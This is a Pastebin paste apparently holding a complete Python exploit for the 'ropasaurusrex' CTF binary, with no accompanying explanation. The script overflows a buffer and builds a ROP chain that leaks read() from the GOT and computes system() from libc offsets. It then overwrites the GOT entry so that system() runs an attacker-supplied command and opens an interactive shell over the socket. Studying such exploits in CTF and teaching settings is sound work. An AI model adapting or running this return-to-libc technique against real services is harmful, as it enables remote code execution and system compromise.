API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 5th, 2016
63
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.44 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. import os, sys, socket
  3. import struct
  4. import telnetlib
  5.  
  6. addr = ('127.0.0.1', 1337)
  7.  
  8. cmd = sys.argv[1]+"\0"
  9.  
  10. #see writeable sections objdump -x ropasaurusrex
  11. #read() in libc offset (ldd ropasaurusrex copy libc path)
  12. #and (objdump -d /lib/i386-linux-gnu/i686/cmov/libc.so.6 | grep _read)
  13. #for system (objdump -d /lib/i386-linux-gnu/i686/cmov/libc.so.6 | grep _system)
  14. libcread_offset = 0xdbe90
  15. libcsystem_offset = 0x3e3e0
  16.  
  17.  
  18. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  19.  
  20. payload = "A"*140
  21.  
  22. #write stdin .dynamic using read@plt
  23. payload += struct.pack("<I", 0x0804832c) #read() call loc (objdump -d ropasaurusrex | grep read)
  24. payload += struct.pack("<I", 0x080484b6) #pppr (ROPgadget --binary ropasaurusrex)
  25. payload += struct.pack("<I", 0) #stdin
  26. payload += struct.pack("<I", 0x08049530) #.dynamic (objdump -x ropasaurusrex)
  27. payload += struct.pack("<I", len(cmd)) #length of cmd
  28.  
  29. #leak addr of read() in randomized libc
  30. payload += struct.pack("<I", 0x0804830c) # write() call loc (objdump -d ropasaurusrex | grep write)
  31. payload += struct.pack("<I", 0x080484b6) #pppr (ROPgadget --binary ropasaurusrex)
  32. payload += struct.pack("<I", 1) #stdout
  33. payload += struct.pack("<I", 0x0804961c)# read() in GOT (objdump -R ropasaurusrex)
  34. payload += struct.pack("<I", 4) #len of read() address
  35.  
  36. #call read@plt to overwrite the ptr stored in read()'s entry in GOT
  37. payload += struct.pack("<I", 0x0804832c) #read() call loc (objdump -d ropasaurusrex | grep read)
  38. payload += struct.pack("<I", 0x080484b6) #pppr (ROPgadget --binary ropasaurusrex)
  39. payload += struct.pack("<I", 0) #stdin
  40. payload += struct.pack("<I", 0x0804961c)# read() in GOT (objdump -R ropasaurusrex)
  41. payload += struct.pack("<I", 4) #len of read() address
  42.  
  43. #call read@plt = addr of system() in libc
  44. payload += struct.pack("<I", 0x0804832c) #read() call loc (objdump -d ropasaurusrex | grep read)
  45. payload += "BBBB" #bogus retn addr
  46. payload += struct.pack("<I", 0x08049530) #.dynamic #system() arg (objdump -x ropasaurusrex)
  47.  
  48.  
  49.  
  50. s.connect(addr)
  51.  
  52. s.send(payload)
  53. s.send(cmd)
  54. #calculate system() addr and send back
  55. readaddr = struct.unpack("<I", s.recv(1024))[0]
  56. print "libc read() found at 0x%.8x" % readaddr
  57. systemaddr = readaddr - libcread_offset + libcsystem_offset
  58. print "libc system() found at 0x%.8x" % systemaddr
  59. s.send(struct.pack("<I", systemaddr))
  60.  
  61. #pass in /bin/sh to get shell
  62. t = telnetlib.Telnet()
  63. t.sock = s
  64. t.interact()
  65.  
  66. print s.recv(1024)
  67.  
  68. s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!